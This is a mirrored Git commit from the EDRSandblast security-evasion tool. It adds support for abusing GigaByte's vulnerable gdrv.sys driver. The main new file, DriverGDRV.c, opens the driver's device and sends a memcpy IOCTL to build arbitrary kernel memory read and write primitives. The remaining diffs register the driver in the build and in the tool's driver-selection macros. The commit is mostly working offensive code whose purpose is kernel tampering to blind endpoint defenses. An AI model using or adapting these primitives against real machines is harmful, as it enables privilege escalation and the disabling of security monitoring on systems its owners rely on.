Mirrors/wavestone-cdt-edrsandblast
1
0
Fork 0
mirror of https://github.com/wavestone-cdt/EDRSandblast.git synced 2026-06-08 16:37:12 +00:00
Code Issues Packages Projects Releases Wiki Activity

New BYOVD-driver support: GDRV.sys (GigaByte)

Browse Source
This commit is contained in:
v1k1ngfr
2022-12-25 01:07:15 +01:00
committed by Maxime Meignan
parent 9939301140
commit 0bbe76aab1
6 changed files with 142 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
EDRSandblast/Drivers/DriverGDRV.c
+120
View File
@@ -0,0 +1,120 @@
// Details are available here : https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-of-privilege-vulnerabilities/
#include "DriverGDRV.h"
#include <windows.h>
#include <assert.h>
#include <tchar.h>
#if NO_STRINGS
#define _putts_or_not(...)
#define _tprintf_or_not(...)
#define wprintf_or_not(...)
#define printf_or_not(...)
#pragma warning(disable : 4189)
#else
#define _putts_or_not(...) _putts(__VA_ARGS__)
#define _tprintf_or_not(...) _tprintf(__VA_ARGS__)
#define printf_or_not(...) printf(__VA_ARGS__)
#define wprintf_or_not(...) wprintf(__VA_ARGS__)
#endif
/*
* "gdrv.sys" (SHA256: xxx)
*/
struct GDRV_MEMORY_READ {
DWORD64 Dst;
DWORD64 Src;
DWORD ReadSize;
};
struct GDRV_MEMORY_WRITE {
DWORD64 Dst;
DWORD64 Src;
DWORD WriteSize;
};
//#define IOCTL_GIO_MEMCPY 0xC3502808
static const DWORD GDRV_MEMORY_READ_CODE = 0xC3502808;
static const DWORD GDRV_MEMORY_WRITE_CODE = 0xC3502808;
HANDLE g_Device_GDRV = INVALID_HANDLE_VALUE;
HANDLE GetDriverHandle_GDRV() {
if (g_Device_GDRV == INVALID_HANDLE_VALUE) {
TCHAR service[] = TEXT("\\\\.\\GIO");
HANDLE Device = CreateFile(service, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (Device == INVALID_HANDLE_VALUE) {
_tprintf_or_not(TEXT("[!] Unable to obtain a handle to the vulnerable driver, exiting...\n"));
exit(EXIT_FAILURE);
}
g_Device_GDRV = Device;
}
return g_Device_GDRV;
}
VOID CloseDriverHandle_GDRV() {
CloseHandle(g_Device_GDRV);
g_Device_GDRV = INVALID_HANDLE_VALUE;
}
VOID ReadMemoryPrimitive_GDRV(SIZE_T Size, DWORD64 Address, PVOID Buffer) {
if (Address < 0x0000800000000000) {
_tprintf_or_not(TEXT("Userland address used: 0x%016llx\nThis should not happen, aborting...\n"), Address);
exit(1);
}
if (Address < 0xFFFF800000000000) {
_tprintf_or_not(TEXT("Non canonical address used: 0x%016llx\nAborting to avoid a BSOD...\n"), Address);
exit(1);
}
if (Size < sizeof(BYTE) || Size > sizeof(DWORD64)) {
_tprintf_or_not(TEXT("Unsupported size for read operation, aborting...\n"));
exit(1);
}
//copy Size bytes from Src to Dest
struct GDRV_MEMORY_READ ReadCommand = { 0 };
ReadCommand.Src = Address;
ReadCommand.Dst = Buffer;
ReadCommand.ReadSize = Size;
DWORD BytesReturned=0;
DeviceIoControl(GetDriverHandle_GDRV(),
GDRV_MEMORY_READ_CODE,
&ReadCommand,
sizeof(ReadCommand),
&ReadCommand,
sizeof(ReadCommand),
&BytesReturned,
NULL);
}
VOID WriteMemoryPrimitive_GDRV(SIZE_T Size, DWORD64 Address, PVOID Buffer) {
if (Address < 0x0000800000000000) {
_tprintf_or_not(TEXT("Userland address used: 0x%016llx\nThis should not happen, aborting...\n"), Address);
exit(1);
}
if (Address < 0xFFFF800000000000) {
_tprintf_or_not(TEXT("Non canonical address used: 0x%016llx\nAborting to avoid a BSOD...\n"), Address);
exit(1);
}
if (Size < sizeof(BYTE) || Size > sizeof(DWORD64)) {
_putts_or_not(TEXT("Unsupported size for read operation, aborting...\n"));
exit(1);
}
//copy Size bytes from Dest to Src
struct GDRV_MEMORY_WRITE WriteCommand = { 0 };
WriteCommand.Src = Buffer;
WriteCommand.Dst = Address;
WriteCommand.WriteSize = Size;
DWORD BytesReturned = 0;
DeviceIoControl(GetDriverHandle_GDRV(),
GDRV_MEMORY_WRITE_CODE,
&WriteCommand,
sizeof(WriteCommand),
&WriteCommand,
sizeof(WriteCommand),
&BytesReturned,
NULL);
}
EDRSandblast/EDRSandblast.vcxproj
+2
View File
@@ -163,6 +163,7 @@
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemGroup> <ItemGroup>
<ClCompile Include="Drivers\DriverDBUtil.c" /> <ClCompile Include="Drivers\DriverDBUtil.c" />
<ClCompile Include="Drivers\DriverGDRV.c" />
<ClCompile Include="Drivers\DriverRTCore.c" /> <ClCompile Include="Drivers\DriverRTCore.c" />
<ClCompile Include="KernellandBypass\ETWThreatIntel.c" /> <ClCompile Include="KernellandBypass\ETWThreatIntel.c" />
<ClCompile Include="KernellandBypass\KernelCallbacks.c" /> <ClCompile Include="KernellandBypass\KernelCallbacks.c" />
@@ -201,6 +202,7 @@
<ClInclude Include="EDRSandblast.h" /> <ClInclude Include="EDRSandblast.h" />
<ClInclude Include="Includes\CredGuard.h" /> <ClInclude Include="Includes\CredGuard.h" />
<ClInclude Include="Includes\DriverDBUtil.h" /> <ClInclude Include="Includes\DriverDBUtil.h" />
<ClInclude Include="Includes\DriverGDRV.h" />
<ClInclude Include="Includes\DriverRTCore.h" /> <ClInclude Include="Includes\DriverRTCore.h" />
<ClInclude Include="Includes\ProcessDumpDirectSyscalls.h" /> <ClInclude Include="Includes\ProcessDumpDirectSyscalls.h" />
<ClInclude Include="Includes\FileUtils.h" /> <ClInclude Include="Includes\FileUtils.h" />
EDRSandblast/EDRSandblast.vcxproj.filters
+6
View File
@@ -117,6 +117,9 @@
<ClCompile Include="UserlandBypass\ProcessDumpDirectSyscalls.c"> <ClCompile Include="UserlandBypass\ProcessDumpDirectSyscalls.c">
<Filter>Source Files</Filter> <Filter>Source Files</Filter>
</ClCompile> </ClCompile>
<ClCompile Include="Drivers\DriverGDRV.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ClInclude Include="Includes\CredGuard.h"> <ClInclude Include="Includes\CredGuard.h">
@@ -230,6 +233,9 @@
<ClInclude Include="EDRSandblast.h"> <ClInclude Include="EDRSandblast.h">
<Filter>Header Files</Filter> <Filter>Header Files</Filter>
</ClInclude> </ClInclude>
<ClInclude Include="Includes\DriverGDRV.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<MASM Include="Utils\SW2_Syscalls_stubs.x64.asm"> <MASM Include="Utils\SW2_Syscalls_stubs.x64.asm">
EDRSandblast/Includes/DriverGDRV.h
+7
View File
@@ -0,0 +1,7 @@
#pragma once
#include <Windows.h>
HANDLE GetDriverHandle_GDRV();
VOID CloseDriverHandle_GDRV();
VOID ReadMemoryPrimitive_GDRV(SIZE_T Size, DWORD64 Address, PVOID Buffer);
VOID WriteMemoryPrimitive_GDRV(SIZE_T Size, DWORD64 Address, PVOID Buffer);
EDRSandblast/Includes/KernelMemoryPrimitives.h
+6 -1
View File
@@ -11,6 +11,7 @@
#define RTCore 0 #define RTCore 0
#define DBUtil 1 #define DBUtil 1
#define GDRV 2
// Select the driver to use with the following #define // Select the driver to use with the following #define
#define VULN_DRIVER RTCore #define VULN_DRIVER RTCore
@@ -24,9 +25,13 @@
#define CloseDriverHandle CloseDriverHandle_DBUtil #define CloseDriverHandle CloseDriverHandle_DBUtil
#define ReadMemoryPrimitive ReadMemoryPrimitive_DBUtil #define ReadMemoryPrimitive ReadMemoryPrimitive_DBUtil
#define WriteMemoryPrimitive WriteMemoryPrimitive_DBUtil #define WriteMemoryPrimitive WriteMemoryPrimitive_DBUtil
#elif VULN_DRIVER == GDRV
#define DEFAULT_DRIVER_FILE TEXT("gdrv.sys")
#define CloseDriverHandle CloseDriverHandle_GDRV
#define ReadMemoryPrimitive ReadMemoryPrimitive_GDRV
#define WriteMemoryPrimitive WriteMemoryPrimitive_GDRV
#endif #endif
BYTE ReadMemoryBYTE(DWORD64 Address); BYTE ReadMemoryBYTE(DWORD64 Address);
WORD ReadMemoryWORD(DWORD64 Address); WORD ReadMemoryWORD(DWORD64 Address);
DWORD ReadMemoryDWORD(DWORD64 Address); DWORD ReadMemoryDWORD(DWORD64 Address);
EDRSandblast/Utils/KernelMemoryPrimitives.c
+1
View File
@@ -5,6 +5,7 @@
#include "DriverRTCore.h" #include "DriverRTCore.h"
#include "DriverDBUtil.h" #include "DriverDBUtil.h"
#include "DriverGDRV.h"
#include "KernelUtils.h" #include "KernelUtils.h"
#include "../EDRSandblast.h" #include "../EDRSandblast.h"